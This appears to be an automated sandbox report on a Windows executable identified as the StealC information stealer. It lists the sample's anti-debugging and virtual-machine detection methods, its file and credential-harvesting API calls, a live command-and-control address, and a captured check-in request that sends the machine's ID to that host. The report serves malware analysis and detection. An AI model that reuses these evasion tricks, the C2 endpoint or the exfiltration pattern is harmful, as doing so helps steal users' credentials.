Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D0B second address: A17D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FFBC91A3BD6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D1A second address: A17D3F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 jmp 00007FFBC8B2DA9Eh 0x0000000e pop esi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jne 00007FFBC8B2DA96h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D3F second address: A17D59 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jne 00007FFBC91A3BD6h 0x0000000d pop ecx 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FFBC91A3BD6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D59 second address: A17D69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17D69 second address: A17D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A17F94 second address: A17FE1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FFBC8B2DAA6h 0x0000000f nop 0x00000010 sub dx, 1A78h 0x00000015 push dword ptr [ebp+122D2A3Bh] 0x0000001b mov dx, 1DFCh 0x0000001f push 1C538DC7h 0x00000024 push eax 0x00000025 push edx 0x00000026 push esi 0x00000027 pushad 0x00000028 popad 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198A4 second address: A198AE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FFBC91A3BD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198AE second address: A198D7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFBC8B2DA98h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FFBC8B2DAA7h 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A198D7 second address: A198FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FFBC91A3BD6h 0x00000008 jc 00007FFBC91A3BD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFBC91A3BDFh 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A1949C second address: A194A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A194A5 second address: A194B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jp 00007FFBC91A3BD6h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C037C second address: 51C0382 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03C8 second address: 51C03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03CC second address: 51C03D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C03D2 second address: 51C0451 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d mov dh, C0h 0x0000000f movzx eax, di 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFBC91A3BE3h 0x0000001b sbb cx, E4BEh 0x00000020 jmp 00007FFBC91A3BE9h 0x00000025 popfd 0x00000026 mov di, cx 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d pushad 0x0000002e call 00007FFBC91A3BE6h 0x00000033 pop eax 0x00000034 call 00007FFBC91A3BDBh 0x00000039 pop esi 0x0000003a popad 0x0000003b movsx edx, ax 0x0000003e popad 0x0000003f pop ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0451 second address: 51C046E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFBC8B2DAA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C046E second address: 51C0474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 51C0474 second address: 51C0478 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 791BA3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 791AD2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 931174 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 93158E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 92FDF7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 9BBE28 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005438B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00544910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0053E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00544570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0053ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005316D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00543EA0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00531160 GetSystemInfo,ExitProcess,

0_2_00531160

Source: file.exe, file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware@
Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: file.exe, 00000000.00000002.1741085256.0000000001255000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWGe>
Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_005345C0 VirtualProtect ?,00000004,00000100,00000000

0_2_005345C0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\file.exe

0_2_00549860

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549750 mov eax, dword ptr fs:[00000030h]

0_2_00549750

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00547850

Program does not show much activity (idle)

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00549600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00549600

Source: file.exe, 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: file.exe	Binary or memory string: y Program Manager

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00547B90

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00546920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00546920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00547850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00547A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00547A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1693030135.0000000005040000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 6280, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	URL Reputation: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	URL Reputation: malware	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.37/ws	URL Reputation: Label: malware

Found malware configuration

Source: 0.2.file.exe.530000.0.unpack

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,	0_2_0053C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00537240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00537240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00539AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00539AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00539B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00539B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00548EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00548EA0

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	0_2_005438B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_00544910
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053DA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	0_2_0053E430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00544570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,	0_2_00544570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	0_2_0053ED20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	0_2_0053BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_005316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_005316D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0053F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	0_2_0053F6B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00543EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	0_2_00543EA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.37/e2b1563c6670f193.php

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 45 31 30 44 46 44 33 42 38 45 33 39 38 34 32 31 32 34 37 30 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 2d 2d 0d 0a Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="hwid"37E10DFD3B8E3984212470------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build"doma------DGHJEHJJDAAAKEBGCFCA--

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 185.215.113.37 185.215.113.37

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00534880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00534880

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache

Source: unknown

Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/&
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/BiQ
Source: file.exe, 00000000.00000002.1741085256.0000000001224000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/C84BCA9C91821060E9A79u
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpConnectionSettings
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpJ
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phphi
Source: file.exe, 00000000.00000002.1741085256.0000000001236000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1741085256.00000000011DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.37oZ

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:

Detected potential crypto function

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081B0A6	0_2_0081B0A6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008EF9B7	0_2_008EF9B7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0084B1E2	0_2_0084B1E2
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007CD1AD	0_2_007CD1AD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008222FE	0_2_008222FE
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00904214	0_2_00904214
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00900BA0	0_2_00900BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007DFD84	0_2_007DFD84
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FD63E	0_2_008FD63E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008FA637	0_2_008FA637
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00881745	0_2_00881745
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0081EF62	0_2_0081EF62

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\file.exe

Code function: String function: 005345C0 appears 316 times

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe
